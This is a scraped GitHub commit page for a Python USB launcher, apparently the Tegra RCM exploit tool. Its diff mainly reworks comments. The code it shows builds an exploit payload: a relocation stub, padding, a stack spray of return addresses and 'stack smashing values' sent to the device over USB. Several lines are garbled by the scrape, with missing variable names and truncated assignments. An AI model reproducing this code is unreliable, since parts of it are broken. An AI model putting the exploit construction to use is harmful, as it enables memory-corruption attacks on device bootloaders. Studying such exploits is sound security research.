Browse files

Minor documentation changes atop trisz404's PR.

  • Loading branch information...
ktemkin committed May 7, 2018
1 parent 9e0ed49 commit 92d3ebcc81b724ad4e1fa951a150e6fe275f23f1
Showing with 20 additions and 9 deletions.
  1. +20 −9
  2. BIN intermezzo.bin
@@ -26,13 +26,20 @@
import sys
import usb
import time
import errno
import ctypes
import argparse
import platform

# specify the locations of important load components
# The address where the RCM payload is placed.
# This is fixed for most device.
RCM_PAYLOAD_ADDR = 0x40010000

# The address where the user payload is expected to begin.

# Specify the range of addresses where we should inject oct
# payload address.
STACK_SPRAY_END = 0x40017000

@@ -295,7 +302,7 @@ def __init__(self, wait_for_device=False, os_override=None, vid=None, pid=None):

# ... and we're allowed to wait for one, wait indefinitely for one to appear...
if wait_for_device:
print("Waiting for a TegraRCM to come online...")
print("Waiting for a TegraRCM device to come online...")
while is None: = self._find_device()

@@ -456,24 +463,25 @@ def parse_usb_id(id):
payload += intermezzo

# Pad the payload till the start of the payload
# Pad the payload till the start of the user payload.
padding_size = PAYLOAD_START_ADDR - (RCM_PAYLOAD_ADDR + intermezzo_size)
payload += (b'\0' * padding_size)

target_payload = b''
# Read the rest of the payload into memory.

# Read the user payload into memory.
with open(payload_path, "rb") as f:
target_payload =

# First part of the payload
# Fit a collection of the payload before the stack spray...
payload += target_payload[:padding_size]

# Gap in the payload, stack spray
# ... insert the stack spray...
repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)
payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * repeat_count)

# Read the rest of the payload into memory.
# ... and follow the stack spray with the remainder of the payload.
payload += target_payload[padding_size:]

# Pad the payload to fill a USB request exactly, so we don't send a short
@@ -482,9 +490,12 @@ def parse_usb_id(id):
padding_size = 0x1000 - (payload_length % 0x1000)
payload += (b'\0' * padding_size)

# Check to see if our payload packet will fit inside the RCM high buffer.
# If it won't, error out.
if len(payload) > length:
print("ERROR: Too large payload! (%x vs %x)" % (len(payload), length))
size_over = len(payload) - length
print("ERROR: Payload is too large to be submitted via RCM. ({} bytes larger than max).".format(size_over))

# Send the constructed payload, which contains the command, the stack smashing
# values, the Intermezzo relocation stub, and the final payload.
BIN +124 Bytes intermezzo.bin
Binary file not shown.

0 comments on commit 92d3ebc

Please sign in to comment.